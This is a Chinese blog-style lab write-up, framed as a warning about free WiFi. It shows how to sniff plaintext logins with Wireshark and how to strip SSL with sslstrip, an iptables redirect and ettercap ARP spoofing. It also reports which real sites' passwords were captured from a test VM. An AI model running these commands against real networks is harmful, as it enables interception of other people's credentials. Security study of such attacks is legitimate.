您好,登錄后才能下訂單哦!
因寫了一段文字,就有這個抓包實驗
--------------------------------
話說:“現在我們一到某處,第一件事便是問有沒有WiFi”。WiFi成為當下的熱門,在公共場合人們最喜歡免費WiFi。但用著用著后不覺QQ被盜了。這WiFi便是誘餌,釣魚人設了一個局,我們以為撿到便宜了,須不知,我們上勾了。QQ被盜,郵箱被瀏覽等等。免費雖好,請謹慎。
---------------------------------------
1.利用wireshark抓包測試51cto帳戶及密碼
環境的搭建
網絡環境:網關:192.168.199.1;
測試主機:192.168.199.101,ubuntu13.04/wireshark;
測試目標:51cto.com
步驟
a.ubuntu 13.04安裝wireshark
sudo apt-get wireshark
b. 新建wireshark組把普通用戶加入其中,給wireshark使用權限
sudo groupadd wireshark //加組wireshark
sudo gpasswd -a zozlin wireshark //向組 GROUP 中添加用戶 USER
sudo chgrp wireshark /usr/bin/dumpcap // 更抓包文件改組
sudo chmod 4755 /usr/bin/dumpcap //可執行權限
錯誤:
解決方法:sudo gedit /usr/share/wireshark/init.lua
倒數第二行原來為:dofile(DATA_DIR.."console.lua")改為--dofile(DATA_DIR.."console.lua")
c. sudo wireshark 選擇網卡(在本機測試)
定過濾規則
ip.src==192.168.199.100 && http (源地址及http協議)
重點 (post application/x-www-form-urllencoded)
先試試天涯論壇和163郵件的密碼,ssl己加密傳輸了。后51cto 發現是明文帳號密碼
-----------------------------------------
2.利用sslstrip和ettercap突破ssl嗅探密碼
環境的搭建
網絡環境:網關:192.168.199.1;
***主機:192.168.199.101,ubuntu13.04/wireshark/sslstrip;
被***主機:192.168.199.105/103,虛擬機Windowsxp,IE6;
測試目標:51cto.com mail.163.com tianya.cn baidu.com
步驟
下載
http://www.thoughtcrime.org/software/sslstrip/
解壓
tar -zxvf sslstrip-0.9.tar.gz
安裝
sslstrip python setup.py install
打開ip_forword轉發
echo “1”>/proc/sys/net/ipv4/ip_forward
使用Iptables過濾數據包 //通過iptables 把所有http數據導入到10000端口,我們用sslstrip監聽10000端口,并得到我們想要的數據
iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 10000
sslstrip -l 10000
利用ettercap進行arp欺騙
ettercap –T –q –M arp:remote /192.168.199.103/ /192.168.199.1/
成果
mail.163.com 51cto.com 破
baidu.com 密碼再次加密了
tianya.cn 未破
參考1.http://www.freebuf.com/articles/web/5929.html
2.http://www.blogjava.net/heyang/archive/2011/04/05/340330.html
3.http://www.linuxde.net/2011/11/2522.html
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。